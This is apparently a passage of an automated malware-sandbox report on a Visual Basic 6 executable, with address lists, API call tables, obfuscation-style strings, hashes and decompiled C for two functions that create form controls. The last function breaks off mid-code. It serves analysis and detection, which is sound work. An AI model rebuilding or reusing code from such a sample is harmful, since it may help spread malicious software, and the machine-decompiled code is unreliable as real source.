                                  0x0040ec23
                                  0x0040ec43
                                  0x0040ec6b
                                  0x0040ec77
                                  0x0040ec7a
                                  0x0040ec83
                                  0x0040eca2
                                  0x0040eca8
                                  0x0040ecb5
                                  0x0040ecd7
                                  0x0040ecb7
                                  0x0040ecb7
                                  0x0040ecbc
                                  0x0040ecc1
                                  0x0040ecc4
                                  0x0040ecca
                                  0x0040eccf
                                  0x0040eccf
                                  0x0040ecde
                                  0x0040ecef
                                  0x0040ecfc
                                  0x0040ed01
                                  0x0040ed0b
                                  0x0040ed15
                                  0x0040ed24
                                  0x0040ed60
                                  0x0040ed70
                                  0x0040ed75
                                  0x0040ed7e
                                  0x0040ed84
                                  0x0040ed8d
                                  0x0040ed9c
                                  0x0040ede1
                                  0x0040ede7
                                  0x0040edf4
                                  0x0040ee16
                                  0x0040edf6
                                  0x0040edf6
                                  0x0040edfb
                                  0x0040ee00
                                  0x0040ee03
                                  0x0040ee09
                                  0x0040ee0e
                                  0x0040ee0e
                                  0x0040ee23
                                  0x0040ee26
                                  0x0040ee35
                                  0x0040ee41
                                  0x0040ee84
                                  0x0040ee8a
                                  0x0040ee97
                                  0x0040eeb9
                                  0x0040ee99
                                  0x0040ee99
                                  0x0040ee9e
                                  0x0040eea3
                                  0x0040eea6
                                  0x0040eeac
                                  0x0040eeb1
                                  0x0040eeb1
                                  0x0040eec6
                                  0x0040eecf
                                  0x0040eeda
                                  0x0040eee0
                                  0x0040eeea
                                  0x0040eef4
                                  0x0040ef25
                                  0x0040ef32
                                  0x0040ef36
                                  0x0040ef40
                                  0x0040ef51
                                  0x0040ef5c
                                  0x0040efa8
                                  0x0040efae
                                  0x0040efbb
                                  0x0040efdd
                                  0x0040efbd
                                  0x0040efbd
                                  0x0040efc2
                                  0x0040efc7
                                  0x0040efca
                                  0x0040efd0
                                  0x0040efd5
                                  0x0040efd5
                                  0x0040efea
                                  0x0040eff3
                                  0x0040eff9
                                  0x0040f006
                                  0x0040f00b
                                  0x0040f014
                                  0x0040f026
                                  0x0040f02b
                                  0x0040f075
                                  0x0040f082
                                  0x0040f090
                                  0x0040f095
                                  0x0040f0a0
                                  0x0040f0a6
                                  0x0040f0b3
                                  0x0040f0d5
                                  0x0040f0b5
                                  0x0040f0b5
                                  0x0040f0ba
                                  0x0040f0bf
                                  0x0040f0c2
                                  0x0040f0c8
                                  0x0040f0cd
                                  0x0040f0cd
                                  0x0040f0dc
                                  0x0040f0eb
                                  0x0040f0f1
                                  0x0040f0fa
                                  0x0040f103
                                  0x0040f10c
                                  0x0040f151
                                  0x0040f157
                                  0x0040f164
                                  0x0040f186
                                  0x0040f166
                                  0x0040f166
                                  0x0040f16b
                                  0x0040f170
                                  0x0040f173
                                  0x0040f179
                                  0x0040f17e
                                  0x0040f17e
                                  0x0040f18d
                                  0x0040f1b1
                                  0x0040f1be
                                  0x0040f1ca
                                  0x0040f1d7
                                  0x0040f1f1
                                  0x0040f1f7
                                  0x0040f204
                                  0x0040f226
                                  0x0040f206
                                  0x0040f206
                                  0x0040f20b
                                  0x0040f210
                                  0x0040f213
                                  0x0040f219
                                  0x0040f21e
                                  0x0040f21e
                                  0x0040f237
                                  0x0040f23c
                                  0x0040f247
                                  0x0040f24c
                                  0x0040f256
                                  0x0040f260
                                  0x0040f26f
                                  0x0040f272
                                  0x0040f277
                                  0x0040f2aa
                                  0x0040f2c0
                                  0x0040f2cb
                                  0x0040f2db
                                  0x0040f2e0
                                  0x0040f2e3
                                  0x0040f2f5
                                  0x0040f2ff
                                  0x0040f302
                                  0x0040f307
                                  0x0040f311
                                  0x0040f338
                                  0x0040f35d
                                  0x0040f36d
                                  0x0040f372
                                  0x0040f375
                                  0x0040f37e
                                  0x0040f387
                                  0x0040f390
                                  0x0040f39a
                                  0x0040f3b7
                                  0x0040f3c9
                                  0x0040f3f3
                                  0x0040f400
                                  0x0040f40a
                                  0x0040f416
                                  0x0040f41c
                                  0x0040f454
                                  0x0040f45a
                                  0x0040f467
                                  0x0040f489
                                  0x0040f469
                                  0x0040f469
                                  0x0040f46e
                                  0x0040f473
                                  0x0040f476
                                  0x0040f47c
                                  0x0040f481
                                  0x0040f481
                                  0x0040f496
                                  0x0040f49f
                                  0x0040f4a8
                                  0x0040f4ae
                                  0x0040f4b7
                                  0x0040f4c1
                                  0x0040f4cb
                                  0x0040f4d5
                                  0x0040f4df
                                  0x0040f528
                                  0x0040f53a
                                  0x0040f547
                                  0x0040f551
                                  0x0040f572
                                  0x0040f578
                                  0x0040f585
                                  0x0040f5a7
                                  0x0040f587
                                  0x0040f587
                                  0x0040f58c
                                  0x0040f591
                                  0x0040f594
                                  0x0040f59a
                                  0x0040f59f
                                  0x0040f59f
                                  0x0040f5b4
                                  0x0040f5b7
                                  0x0040f5c1
                                  0x0040f5ca
                                  0x0040f5d3
                                  0x0040f5dd
                                  0x0040f625
                                  0x0040f635
                                  0x0040f63b
                                  0x0040f648
                                  0x0040f66a
                                  0x0040f64a
                                  0x0040f64a
                                  0x0040f64f
                                  0x0040f654
                                  0x0040f657
                                  0x0040f65d
                                  0x0040f662
                                  0x0040f662
                                  0x0040f677
                                  0x0040f692
                                  0x0040f6a7
                                  0x0040f6ad
                                  0x0040f6ba
                                  0x0040f6dc
                                  0x0040f6bc
                                  0x0040f6bc
                                  0x0040f6c1
                                  0x0040f6c6
                                  0x0040f6c9
                                  0x0040f6cf
                                  0x0040f6d4
                                  0x0040f6d4
                                  0x0040f6e9
                                  0x0040f6f2
                                  0x0040f6f8
                                  0x0040f717
                                  0x0040f71a
                                  0x0040f729
                                  0x0040f73e
                                  0x0040f74a
                                  0x0040f74d
                                  0x0040f757
                                  0x0040f760
                                  0x0040f76a
                                  0x0040f77a
                                  0x0040f7ac
                                  0x0040f7af
                                  0x0040f7be
                                  0x0040f7ca
                                  0x0040f7d0
                                  0x0040f7f5
                                  0x0040f7fb
                                  0x0040f808
                                  0x0040f82a
                                  0x0040f80a
                                  0x0040f80a
                                  0x0040f80f
                                  0x0040f814
                                  0x0040f817
                                  0x0040f81d
                                  0x0040f822
                                  0x0040f822
                                  0x0040f840
                                  0x0040f846
                                  0x0040f853
                                  0x0040f875
                                  0x0040f855
                                  0x0040f855
                                  0x0040f85a
                                  0x0040f85f
                                  0x0040f862
                                  0x0040f868
                                  0x0040f86d
                                  0x0040f86d
                                  0x0040f883
                                  0x0040f88f
                                  0x0040f895
                                  0x0040f8a3
                                  0x0040f8a6
                                  0x0040f8ab
                                  0x0040f8c3
                                  0x0040f8d2
                                  0x0040f8e4
                                  0x0040f8ed
                                  0x0040f8f2
                                  0x0040f919
                                  0x0040f925
                                  0x0040f930
                                  0x0040f933
                                  0x0040f93e
                                  0x0040f94a
                                  0x0040f950
                                  0x0040f95a
                                  0x0040f964
                                  0x0040f982
                                  0x0040f991
                                  0x0040f9c2
                                  0x0040f9c8
                                  0x0040f9d5
                                  0x0040f9f7
                                  0x0040f9d7
                                  0x0040f9d7
                                  0x0040f9dc
                                  0x0040f9e1
                                  0x0040f9e4
                                  0x0040f9ea
                                  0x0040f9ef
                                  0x0040f9ef
                                  0x0040fa04
                                  0x0040fa07
                                  0x0040fa0a
                                  0x0040fa17
                                  0x0040fa25
                                  0x0040fa2b
                                  0x0040fa38
                                  0x0040fa5a
                                  0x0040fa3a
                                  0x0040fa3a
                                  0x0040fa3f
                                  0x0040fa44
                                  0x0040fa47
                                  0x0040fa4d
                                  0x0040fa52
                                  0x0040fa52
                                  0x0040fa6d
                                  0x0040fa78
                                  0x0040fa84
                                  0x0040fa8a
                                  0x0040fab3
                                  0x0040fab9
                                  0x0040fac6
                                  0x0040fae8
                                  0x0040fac8
                                  0x0040fac8
                                  0x0040facd
                                  0x0040fad2
                                  0x0040fad5
                                  0x0040fadb
                                  0x0040fae0
                                  0x0040fae0
                                  0x0040faef
                                  0x0040fb00
                                  0x0040fb36
                                  0x0040fb3c
                                  0x0040fb49
                                  0x0040fb6b
                                  0x0040fb4b
                                  0x0040fb4b
                                  0x0040fb50
                                  0x0040fb55
                                  0x0040fb58
                                  0x0040fb5e
                                  0x0040fb63
                                  0x0040fb63
                                  0x0040fb75
                                  0x0040fb80
                                  0x0040fba1
                                  0x0040fbad
                                  0x0040fbb0
                                  0x0040fbbf
                                  0x0040fbe7
                                  0x0040fbf9
                                  0x0040fbff
                                  0x0040fc0c
                                  0x0040fc2e
                                  0x0040fc0e
                                  0x0040fc0e
                                  0x0040fc13
                                  0x0040fc18
                                  0x0040fc1b
                                  0x0040fc21
                                  0x0040fc26
                                  0x0040fc26
                                  0x0040fc3a
                                  0x0040fc3d
                                  0x0040fc42
                                  0x0040fc4b
                                  0x0040fc5b
                                  0x0040fc72
                                  0x0040fc84
                                  0x0040fc9d
                                  0x0040fca3
                                  0x0040fcb0
                                  0x0040fcd2
                                  0x0040fcb2
                                  0x0040fcb2
                                  0x0040fcb7
                                  0x0040fcbc
                                  0x0040fcbf
                                  0x0040fcc5
                                  0x0040fcca
                                  0x0040fcca
                                  0x0040fcdc
                                  0x0040fceb
                                  0x0040fcf1
                                  0x0040fcf3
                                  0x0040fd00
                                  0x0040fd22
                                  0x0040fd02
                                  0x0040fd02
                                  0x0040fd07
                                  0x0040fd0c
                                  0x0040fd0f
                                  0x0040fd15
                                  0x0040fd1a
                                  0x0040fd1a
                                  0x0040fd38
                                  0x0040fd3e
                                  0x0040fd45
                                  0x0040fd46
                                  0x00000000

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 0040EAE2
                                  • __vbaNew2.MSVBVM60(00402774,0041333C,?,?,?,?,004014F6), ref: 0040EB23
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402764,00000014), ref: 0040EB85
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402784,00000078), ref: 0040EBDE
                                  • __vbaFreeObj.MSVBVM60(00000000,?,00402784,00000078), ref: 0040EC00
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040259C,000006F8,?,003FC073,?,?), ref: 0040ECCA
                                  • __vbaStrCopy.MSVBVM60(?,003FC073,?,?), ref: 0040ECEF
                                  • __vbaStrCopy.MSVBVM60(?,003FC073,?,?), ref: 0040ECFC
                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,003FC073,?,?), ref: 0040ED70
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040259C,000006FC), ref: 0040EE09
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040259C,00000700), ref: 0040EEAC
                                  • __vbaStrCopy.MSVBVM60 ref: 0040EF51
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040259C,00000704), ref: 0040EFD0
                                  • __vbaFreeStr.MSVBVM60(00000000,00401268,0040259C,00000704), ref: 0040EFF9
                                  • __vbaStrCopy.MSVBVM60(00000000,00401268,0040259C,00000704), ref: 0040F006
                                  • __vbaStrCopy.MSVBVM60(00000000,00401268,0040259C,00000704), ref: 0040F026
                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040F090
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040259C,00000708), ref: 0040F0C8
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040259C,0000070C), ref: 0040F179
                                  • __vbaStrCopy.MSVBVM60 ref: 0040F1CA
                                  • __vbaStrCopy.MSVBVM60 ref: 0040F1D7
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040259C,00000710), ref: 0040F219
                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040F237
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,004014F6), ref: 0040F247
                                  • __vbaStrCopy.MSVBVM60 ref: 0040F272
                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,006B48D8,?,?,?,950D78B0,004C041C,002DF651,00006BA0,0000106F,?), ref: 0040F2DB
                                  • __vbaStrCopy.MSVBVM60 ref: 0040F2F5
                                  • __vbaStrCopy.MSVBVM60 ref: 0040F302
                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,Neapolitanernes9,Femaaret1,004BF5BE), ref: 0040F36D
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040259C,00000714,?,?,00006589,?,BREGNEMOS,?), ref: 0040F47C
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040259C,00000718,?,?,31A5AE00,0000278F,0061043C,8A7D0750,00005AFF,0000668F,?,00004691,0000592A), ref: 0040F59A
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040259C,0000071C,?,?,000067DF,007C54D2,0080397E,00003CF0,004D1BA3,00007308,22E85140,00005B03,004186F1), ref: 0040F65D
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040259C,00000720,?,0080397E,85536C70,?,?,000067DF,007C54D2,0080397E,00003CF0,004D1BA3,00007308,22E85140), ref: 0040F6CF
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040259C,00000724,?,?,7DF0FFF0,00005CE9,0065F8FE,000026CE,00001837,00161041,?,?,aG?), ref: 0040F81D
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040259C,00000728,?,?,7DF0FFF0,00005CE9,0065F8FE,000026CE,00001837,00161041,?,?,aG?), ref: 0040F868
                                  • __vbaStrCopy.MSVBVM60(?,?,7DF0FFF0,00005CE9,0065F8FE,000026CE,00001837,00161041,?,?,aG?,?,85536C70,31A5AE00,?,0080397E), ref: 0040F8A6
                                  • __vbaFreeStr.MSVBVM60(?,?,?,?,00006DA8,?,?,7DF0FFF0,00005CE9,0065F8FE,000026CE,00001837,00161041,?,?,aG?), ref: 0040F8ED
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,00006DA8,?,?,7DF0FFF0,00005CE9,0065F8FE,000026CE,00001837,00161041,?,?,aG?), ref: 0040F933
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040259C,0000072C,?,?,?,?,00161041,?,?,?,?,?,00006DA8), ref: 0040F9EA
                                  • __vbaFreeStr.MSVBVM60(?,?,?,?,00161041,?,?,?,?,?,00006DA8,?,?,7DF0FFF0,00005CE9,0065F8FE), ref: 0040FA0A
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040259C,00000730,?,?,?,?,00161041,?,?,?,?,?,00006DA8), ref: 0040FA4D
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040259C,00000734,?,005D86FE,?,?,?,?,00161041,?,?,?,?), ref: 0040FADB
                                  • __vbaStrCopy.MSVBVM60(?,005D86FE,?,?,?,?,00161041,?,?,?,?,?,00006DA8,?,?,7DF0FFF0), ref: 0040FB00
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040259C,00000738,?,005D86FE,?,?,?,?,00161041,?,?,?,?), ref: 0040FB5E
                                  • __vbaFreeStr.MSVBVM60(?,005D86FE,?,?,?,?,00161041,?,?,?,?,?,00006DA8,?,?,7DF0FFF0), ref: 0040FB75
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040259C,0000073C,?,FEDB0060,00005AF6,000064E5,00004ECB,000022AD,?,005D86FE,?,?,?), ref: 0040FC21
                                  • __vbaStrCopy.MSVBVM60(?,FEDB0060,00005AF6,000064E5,00004ECB,000022AD,?,005D86FE,?,?,?,?,00161041,?), ref: 0040FC3D
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040259C,00000740,?,?,0000214D,?,?,?,00003B8B,?,FEDB0060,00005AF6,000064E5,00004ECB), ref: 0040FCC5
                                  • __vbaFreeStr.MSVBVM60(?,?,0000214D,?,?,?,00003B8B,?,FEDB0060,00005AF6,000064E5,00004ECB,000022AD,?,005D86FE), ref: 0040FCDC
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,0040256C,000001BC,?,?,0000214D,?,?,?,00003B8B,?,FEDB0060,00005AF6,000064E5,00004ECB), ref: 0040FD15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckHresult$Copy$Free$List$ChkstkNew2
                                  • String ID: *Y$<3A$ACROMIOCLAVICULAR$Attenuating$BREGNEMOS$COORDINATORY$Ciceronically$DI$Femaaret1$I.$Industrivirksomhed9$Korrekturrettet3$M!$MARMENNILL$Neapolitanernes9$Nonbrand$Outcut8$POSTMULTIPLIED$Princesslike2$Rapportopgaveer$STAMPNING$STRUKTURELLES$Stjernetaager$Tassets$UDSENDELSESLEDERENS$UNGDOMSFNGSELS$Unimputed7$Untheologize8$Yor9$aG?$brysthulernes$degenereringens$glimmeringly$mindedigtet$nonleaded$pentalogies$plasmodiate$G
                                  • API String ID: 2697884310-3846647724
                                  • Opcode ID: e2c6a276e233658ab92a5e2dd4419f52814251d3363e244ba2d7718ad3827028
                                  • Instruction ID: 47fa84ff93975ec5b3082602ba34c53e7504610584f3f7dd5ff1805457dd7cd1
                                  • Opcode Fuzzy Hash: e2c6a276e233658ab92a5e2dd4419f52814251d3363e244ba2d7718ad3827028
                                  • Instruction Fuzzy Hash: 68B2C571900219EFDB20DF50CD89BD9BBB9FF08300F0080EAF649A62A1DB755A98DF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410C9D, Relevance: 65.0, APIs: 28, Strings: 9, Instructions: 214COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 40%
                                  			E00410C9D(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a44) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v36;
				char _v40;
				void* _v44;
				void* _v52;
				signed int _v56;
				char _v72;
				signed int _v96;
				char _v104;
				char* _v128;
				intOrPtr _v136;
				signed int _v156;
				signed int _v160;
				intOrPtr* _v164;
				signed int _v168;
				signed int _v176;
				signed int _v180;
				char _v184;
				signed int _v188;
				signed int _v192;
				signed int _t95;
				char* _t98;
				char* _t103;
				signed int _t104;
				char* _t105;
				signed int _t111;
				signed int _t117;
				void* _t144;
				intOrPtr _t146;

				 *[fs:0x0] = _t146;
				L004014F0();
				_v12 = _t146;
				_v8 = 0x401378;
				L004016A6();
				_v96 = L"VB.PictureBox";
				_v104 = 8;
				_v128 = L"brass";
				_v136 = 8;
				_t95 =  *((intOrPtr*)( *_a4 + 0x218))(_a4,  &_v52, __edi, __esi, __ebx,  *[fs:0x0], 0x4014f6, __ecx, __ecx, _t144);
				asm("fclex");
				_v156 = _t95;
				if(_v156 >= 0) {
					_v180 = _v180 & 0x00000000;
				} else {
					_push(0x218);
					_push(0x40256c);
					_push(_a4);
					_push(_v156);
					L004016B2();
					_v180 = _t95;
				}
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(2);
				_push(L"Add");
				_push(_v52);
				_t98 =  &_v72;
				_push(_t98); // executed
				L004015E6(); // executed
				_push(_t98);
				L004015EC();
				_push(_t98);
				_push( &_v40);
				L00401610();
				L004016AC();
				L0040167C();
				_v96 = 0x6122;
				_v104 = 2;
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Left");
				_push(_v40);
				L004015E0();
				_v96 = 0x65c1;
				_v104 = 2;
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Top");
				_push(_v40);
				L004015E0();
				_v96 = _v96 | 0xffffffff;
				_v104 = 0xb;
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Visible");
				_push(_v40);
				L004015E0();
				_v96 = _v96 | 0xffffffff;
				_v104 = 0x800b;
				_push(0);
				_push(L"Enabled");
				_push(_v40);
				_t103 =  &_v72;
				_push(_t103);
				L004015E6();
				_push(_t103);
				_t104 =  &_v104;
				_push(_t104);
				L00401688();
				_v156 = _t104;
				L0040167C();
				_t105 = _v156;
				if(_t105 != 0) {
					if( *0x41333c != 0) {
						_v184 = 0x41333c;
					} else {
						_push(0x41333c);
						_push(0x402774);
						L004016B8();
						_v184 = 0x41333c;
					}
					_t51 =  &_v184; // 0x41333c
					_v156 =  *((intOrPtr*)( *_t51));
					_t111 =  *((intOrPtr*)( *_v156 + 0x1c))(_v156,  &_v52);
					asm("fclex");
					_v160 = _t111;
					if(_v160 >= 0) {
						_v188 = _v188 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x402764);
						_push(_v156);
						_push(_v160);
						L004016B2();
						_v188 = _t111;
					}
					_v164 = _v52;
					_v96 = 0x80020004;
					_v104 = 0xa;
					L004014F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t117 =  *((intOrPtr*)( *_v164 + 0x54))(_v164, 0x10,  &_v56);
					asm("fclex");
					_v168 = _t117;
					if(_v168 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x54);
						_push(0x402c08);
						_push(_v164);
						_push(_v168);
						L004016B2();
						_v192 = _t117;
					}
					_v176 = _v56;
					_v56 = _v56 & 0x00000000;
					_push(_v176);
					_t105 =  &_v36;
					_push(_t105);
					L004015DA();
					L004016AC();
				}
				_push(0x410fcc);
				L0040167C();
				L004016AC();
				L0040169A();
				return _t105;
			}

































                                  0x00410cae
                                  0x00410cba
                                  0x00410cc2
                                  0x00410cc5
                                  0x00410cd2
                                  0x00410cd7
                                  0x00410cde
                                  0x00410ce5
                                  0x00410cec
                                  0x00410d02
                                  0x00410d08
                                  0x00410d0a
                                  0x00410d17
                                  0x00410d39
                                  0x00410d19
                                  0x00410d19
                                  0x00410d1e
                                  0x00410d23
                                  0x00410d26
                                  0x00410d2c
                                  0x00410d31
                                  0x00410d31
                                  0x00410d40
                                  0x00410d43
                                  0x00410d4d
                                  0x00410d4e
                                  0x00410d4f
                                  0x00410d50
                                  0x00410d51
                                  0x00410d54
                                  0x00410d61
                                  0x00410d62
                                  0x00410d63
                                  0x00410d64
                                  0x00410d65
                                  0x00410d67
                                  0x00410d6c
                                  0x00410d6f
                                  0x00410d72
                                  0x00410d73
                                  0x00410d7b
                                  0x00410d7c
                                  0x00410d81
                                  0x00410d85
                                  0x00410d86
                                  0x00410d8e
                                  0x00410d96
                                  0x00410d9b
                                  0x00410da2
                                  0x00410da9
                                  0x00410dac
                                  0x00410db6
                                  0x00410db7
                                  0x00410db8
                                  0x00410db9
                                  0x00410dba
                                  0x00410dbf
                                  0x00410dc2
                                  0x00410dc7
                                  0x00410dce
                                  0x00410dd5
                                  0x00410dd8
                                  0x00410de2
                                  0x00410de3
                                  0x00410de4
                                  0x00410de5
                                  0x00410de6
                                  0x00410deb
                                  0x00410dee
                                  0x00410df3
                                  0x00410df7
                                  0x00410dfe
                                  0x00410e01
                                  0x00410e0b
                                  0x00410e0c
                                  0x00410e0d
                                  0x00410e0e
                                  0x00410e0f
                                  0x00410e14
                                  0x00410e17
                                  0x00410e1c
                                  0x00410e20
                                  0x00410e27
                                  0x00410e29
                                  0x00410e2e
                                  0x00410e31
                                  0x00410e34
                                  0x00410e35
                                  0x00410e3d
                                  0x00410e3e
                                  0x00410e41
                                  0x00410e42
                                  0x00410e47
                                  0x00410e51
                                  0x00410e56
                                  0x00410e5f
                                  0x00410e6c
                                  0x00410e89
                                  0x00410e6e
                                  0x00410e6e
                                  0x00410e73
                                  0x00410e78
                                  0x00410e7d
                                  0x00410e7d
                                  0x00410e93
                                  0x00410e9b
                                  0x00410eb3
                                  0x00410eb6
                                  0x00410eb8
                                  0x00410ec5
                                  0x00410ee7
                                  0x00410ec7
                                  0x00410ec7
                                  0x00410ec9
                                  0x00410ece
                                  0x00410ed4
                                  0x00410eda
                                  0x00410edf
                                  0x00410edf
                                  0x00410ef1
                                  0x00410ef7
                                  0x00410efe
                                  0x00410f0c
                                  0x00410f16
                                  0x00410f17
                                  0x00410f18
                                  0x00410f19
                                  0x00410f28
                                  0x00410f2b
                                  0x00410f2d
                                  0x00410f3a
                                  0x00410f5c
                                  0x00410f3c
                                  0x00410f3c
                                  0x00410f3e
                                  0x00410f43
                                  0x00410f49
                                  0x00410f4f
                                  0x00410f54
                                  0x00410f54
                                  0x00410f66
                                  0x00410f6c
                                  0x00410f70
                                  0x00410f76
                                  0x00410f79
                                  0x00410f7a
                                  0x00410f82
                                  0x00410f82
                                  0x00410f87
                                  0x00410fb6
                                  0x00410fbe
                                  0x00410fc6
                                  0x00410fcb

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00410CBA
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 00410CD2
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040256C,00000218), ref: 00410D2C
                                  • __vbaChkstk.MSVBVM60(00000000,?,0040256C,00000218), ref: 00410D43
                                  • __vbaChkstk.MSVBVM60(00000000,?,0040256C,00000218), ref: 00410D54
                                  • __vbaLateMemCallLd.MSVBVM60(?,?,Add,00000002), ref: 00410D73
                                  • __vbaObjVar.MSVBVM60(00000000), ref: 00410D7C
                                  • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000), ref: 00410D86
                                  • __vbaFreeObj.MSVBVM60(?,00000000,00000000), ref: 00410D8E
                                  • __vbaFreeVar.MSVBVM60(?,00000000,00000000), ref: 00410D96
                                  • __vbaChkstk.MSVBVM60 ref: 00410DAC
                                  • __vbaLateMemSt.MSVBVM60(?,Left), ref: 00410DC2
                                  • __vbaChkstk.MSVBVM60(?,Left), ref: 00410DD8
                                  • __vbaLateMemSt.MSVBVM60(?,Top,?,Left), ref: 00410DEE
                                  • __vbaChkstk.MSVBVM60(?,Top,?,Left), ref: 00410E01
                                  • __vbaLateMemSt.MSVBVM60(?,Visible,?,Top,?,Left), ref: 00410E17
                                  • __vbaLateMemCallLd.MSVBVM60(?,?,Enabled,00000000,?,Visible,?,Top,?,Left), ref: 00410E35
                                  • __vbaVarTstNe.MSVBVM60(?,00000000,?,?,00000000,00000000), ref: 00410E42
                                  • __vbaFreeVar.MSVBVM60(?,00000000,?,?,00000000,00000000), ref: 00410E51
                                  • __vbaNew2.MSVBVM60(00402774,0041333C,?,00000000,?,?,00000000,00000000), ref: 00410E78
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402764,0000001C), ref: 00410EDA
                                  • __vbaChkstk.MSVBVM60(00000000), ref: 00410F0C
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402C08,00000054), ref: 00410F4F
                                  • __vbaVarSetObj.MSVBVM60(?,?), ref: 00410F7A
                                  • __vbaFreeObj.MSVBVM60(?,?), ref: 00410F82
                                  • __vbaFreeVar.MSVBVM60(00410FCC,?,00000000,?,?,00000000,00000000), ref: 00410FB6
                                  • __vbaFreeObj.MSVBVM60(00410FCC,?,00000000,?,?,00000000,00000000), ref: 00410FBE
                                  • __vbaFreeStr.MSVBVM60(00410FCC,?,00000000,?,?,00000000,00000000), ref: 00410FC6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$ChkstkFree$Late$CheckHresult$Call$AddrefCopyNew2
                                  • String ID: "a$<3A$Add$Enabled$Left$Top$VB.PictureBox$Visible$brass
                                  • API String ID: 3443568900-3680097262
                                  • Opcode ID: ab4f7aa8dc320a0148a36d227033d52cfa7f2e1f786f5e5ede3dc7773f43a515
                                  • Instruction ID: d698d59263facbe5ac17320239e0f4271e2364ee497b09ed08655785a0fa1c46
                                  • Opcode Fuzzy Hash: ab4f7aa8dc320a0148a36d227033d52cfa7f2e1f786f5e5ede3dc7773f43a515
                                  • Instruction Fuzzy Hash: 31811B71D00718ABDF11EFA1CD46BCDB7B6AF05304F1044AAB5087B2E2C7B95A858F59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004121EC, Relevance: 52.7, APIs: 21, Strings: 9, Instructions: 151COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 31%
                                  			E004121EC(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char _v36;
				char _v52;
				signed int _v76;
				char _v84;
				char* _v108;
				intOrPtr _v116;
				signed int _v136;
				signed int _v144;
				signed int _t56;
				char* _t59;
				char* _t65;
				signed int _t66;
				void* _t87;
				intOrPtr _t89;

				 *[fs:0x0] = _t89;
				L004014F0();
				_v12 = _t89;
				_v8 = 0x4014a8;
				_v76 = L"VB.CommandButton";
				_v84 = 8;
				_v108 = L"Fieldfight";
				_v116 = 8;
				_t56 =  *((intOrPtr*)( *_a4 + 0x218))(_a4,  &_v36, __edi, __esi, __ebx, 0x7c,  *[fs:0x0], 0x4014f6, __ecx, __ecx, _t87);
				asm("fclex");
				_v136 = _t56;
				if(_v136 >= 0) {
					_v144 = _v144 & 0x00000000;
				} else {
					_push(0x218);
					_push(0x40256c);
					_push(_a4);
